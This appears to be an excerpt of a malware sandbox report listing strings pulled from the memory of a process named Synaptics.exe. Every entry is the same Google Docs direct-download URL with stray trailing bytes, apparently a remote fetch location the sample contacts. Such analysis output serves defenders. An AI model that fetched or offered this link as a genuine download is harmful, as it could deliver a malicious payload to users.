                          Source: Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2351047160.000000001DBCA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2346850361.000000001D9E0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2302077647.0000000007319000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2284139607.0000000000812000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2326518433.000000000F1E8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2302077647.0000000007227000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2320716788.000000000EE42000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2356528382.000000001DE5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download(
                          Source: Synaptics.exe, 00000004.00000002.2295363513.00000000052D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download(X
                          Source: Synaptics.exe, 00000004.00000002.2324126322.000000000F02B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2320716788.000000000EE42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download)
                          Source: Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download)p
                          Source: Synaptics.exe, 00000004.00000002.2324126322.000000000F02B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-$
                          Source: Synaptics.exe, 00000004.00000002.2295363513.00000000052A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-C
                          Source: Synaptics.exe, 00000004.00000002.2324126322.000000000F02B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-U
                          Source: Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2302077647.00000000071F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-V
                          Source: Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-b
                          Source: Synaptics.exe, 00000004.00000002.2324126322.000000000F02B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-f
                          Source: Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-t
                          Source: Synaptics.exe, 00000004.00000002.2284139607.00000000007FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-wow6YWB
                          Source: Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-~
                          Source: Synaptics.exe, 00000004.00000002.2295363513.00000000052A0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2323125188.000000000EF86000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2352346675.000000001DC47000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2302077647.0000000007319000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2302077647.0000000007279000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2354766641.000000001DD78000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2325143864.000000000F0A4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2320716788.000000000EE42000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2356528382.000000001DE5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.
                          Source: Synaptics.exe, 00000004.00000002.2295363513.00000000052A0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2323125188.000000000EF86000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2352346675.000000001DC47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download..
                          Source: Synaptics.exe, 00000004.00000002.2323125188.000000000EF86000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2352346675.000000001DC47000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2354766641.000000001DD78000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2356528382.000000001DE5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download...
                          Source: Synaptics.exe, 00000004.00000002.2323125188.000000000EF86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.O
                          Source: Synaptics.exe, 00000004.00000002.2321971186.000000000EF01000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2323125188.000000000EF86000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2346850361.000000001D9E0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2320716788.000000000EE42000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2302077647.00000000071C2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2356043485.000000001DDEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.c
                          Source: Synaptics.exe, 00000004.00000002.2351047160.000000001DBCA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.c#
                          Source: Synaptics.exe, 00000004.00000002.2323125188.000000000EF86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.c(g
                          Source: Synaptics.exe, 00000004.00000002.2351047160.000000001DBCA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.cS
                          Source: Synaptics.exe, 00000004.00000002.2295363513.00000000052A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.cn
                          Source: Synaptics.exe, 00000004.00000002.2352346675.000000001DC3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.e
                          Source: Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2346850361.000000001D9E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.g
                          Source: Synaptics.exe, 00000004.00000002.2295363513.00000000052A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.goog
                          Source: Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.n
                          Source: Synaptics.exe, 00000004.00000002.2295363513.00000000052D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.user
                          Source: Synaptics.exe, 00000004.00000002.2321971186.000000000EF01000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2295363513.00000000052D3000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2324126322.000000000F02B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2320716788.000000000EE42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download/
                          Source: Synaptics.exe, 00000004.00000002.2295363513.00000000052A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download/.O
                          Source: Synaptics.exe, 00000004.00000002.2324126322.000000000F02B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2354766641.000000001DD78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download/_
                          Source: Synaptics.exe, 00000004.00000002.2284139607.00000000007FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download/imag
                          Source: Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download/z
                          Source: Synaptics.exe, 00000004.00000002.2295363513.00000000052A0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2295363513.00000000052D3000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2302077647.00000000071F4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2284139607.00000000007FE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2323125188.000000000EF86000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2352346675.000000001DC47000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2346850361.000000001D9E0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2302077647.0000000007319000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2284139607.0000000000812000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2354766641.000000001DD78000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2326518433.000000000F1E8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2325143864.000000000F0A4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2320716788.000000000EE42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0
                          Source: Synaptics.exe, 00000004.00000002.2295363513.00000000052A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0(v-
                          Source: Synaptics.exe, 00000004.00000002.2295363513.00000000052A0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2324126322.000000000F02B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download02
                          Source: Synaptics.exe, 00000004.00000002.2324126322.000000000F02B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0:3
                          Source: Synaptics.exe, 00000004.00000002.2352346675.000000001DC3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0BxsM5
                          Source: Synaptics.exe, 00000004.00000002.2324126322.000000000F02B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2352346675.000000001DC3A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2284139607.00000000007FE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2284139607.0000000000812000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2325143864.000000000F0A4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2302077647.00000000072BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1
                          Source: Synaptics.exe, 00000004.00000002.2302077647.00000000071F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1W
                          Source: Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1s
                          Source: Synaptics.exe, 00000004.00000002.2323125188.000000000EF86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1z
                          Source: Synaptics.exe, 00000004.00000002.2324126322.000000000F02B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2323125188.000000000EF86000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2302077647.0000000007367000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2349487470.000000001DAED000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2325143864.000000000F0A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download2
                          Source: Synaptics.exe, 00000004.00000002.2323125188.000000000EF86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download20I
                          Source: Synaptics.exe, 00000004.00000002.2302077647.00000000071F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download250106V
                          Source: Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download2DH
                          Source: Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download2pK
                          Source: Synaptics.exe, 00000004.00000002.2323125188.000000000EF86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download2t
                          Source: Synaptics.exe, 00000004.00000002.2321971186.000000000EF01000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2324126322.000000000F02B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2352346675.000000001DC47000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2326518433.000000000F1E8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2325143864.000000000F0A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download3
                          Source: Synaptics.exe, 00000004.00000002.2323125188.000000000EF86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download3L
                          Source: Synaptics.exe, 00000004.00000002.2295363513.00000000052A0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2295363513.00000000052D3000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2351047160.000000001DBCA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2326518433.000000000F1E8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2325143864.000000000F0A4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2302077647.0000000007227000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download4
                          Source: Synaptics.exe, 00000004.00000002.2295363513.00000000052A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download4%
                          Source: Synaptics.exe, 00000004.00000002.2324126322.000000000F02B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download44
                          Source: Synaptics.exe, 00000004.00000002.2323125188.000000000EF86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download4M
                          Source: Synaptics.exe, 00000004.00000002.2295363513.00000000052A0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2302077647.0000000007319000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2284139607.0000000000812000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2302077647.0000000007279000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2321971186.000000000EEDD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2326518433.000000000F1E8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2325143864.000000000F0A4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2320716788.000000000EE42000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2302077647.00000000072BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download5
                          Source: Synaptics.exe, 00000004.00000002.2351047160.000000001DBCA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2302077647.00000000071C2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2356043485.000000001DDEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download5Z
                          Source: Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download5xK
                          Source: Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download6~O
                          Source: Synaptics.exe, 00000004.00000002.2321971186.000000000EF01000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2324126322.000000000F02B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2354766641.000000001DD78000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2320716788.000000000EE42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download7
                          Source: Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download7EM
                          Source: Synaptics.exe, 00000004.00000002.2284139607.00000000007FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download7ZI
                          Source: Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2324126322.000000000F02B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2351047160.000000001DBCA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2321971186.000000000EEDD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2325143864.000000000F0A4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2302077647.0000000007227000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2320716788.000000000EE42000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2356043485.000000001DDEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download8
                          Source: Synaptics.exe, 00000004.00000002.2295363513.00000000052A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download8.x
                          Source: Synaptics.exe, 00000004.00000002.2295363513.00000000052A0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2325143864.000000000F0A4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2302077647.00000000072BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download9
                          Source: Synaptics.exe, 00000004.00000002.2295363513.00000000052A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download92845
                          Source: Synaptics.exe, 00000004.00000002.2324126322.000000000F02B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download95
                          Source: Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download9FO
                          Source: Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download9rN
                          Source: Synaptics.exe, 00000004.00000002.2324126322.000000000F02B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2352346675.000000001DC3A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2323125188.000000000EF86000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2284139607.0000000000812000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2302077647.0000000007367000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2326518433.000000000F1E8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2356528382.000000001DE5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download:
                          Source: Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download:G
                          Source: Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download:sC
                          Source: Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2324126322.000000000F02B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2323125188.000000000EF86000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2302077647.0000000007319000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2302077647.0000000007279000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2326518433.000000000F1E8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2325143864.000000000F0A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download;
                          Source: Synaptics.exe, 00000004.00000002.2323125188.000000000EF86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download;O
                          Source: Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2352346675.000000001DC47000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2302077647.0000000007319000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2302077647.0000000007279000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2325143864.000000000F0A4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2320716788.000000000EE42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download=
                          Source: Synaptics.exe, 00000004.00000002.2352346675.000000001DC3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download=0
                          Source: Synaptics.exe, 00000004.00000002.2324126322.000000000F02B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2352346675.000000001DC3A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2320716788.000000000EE42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download?
                          Source: Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download?DE
                          Source: Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download?pD
                          Source: Synaptics.exe, 00000004.00000002.2323125188.000000000EF86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download?t
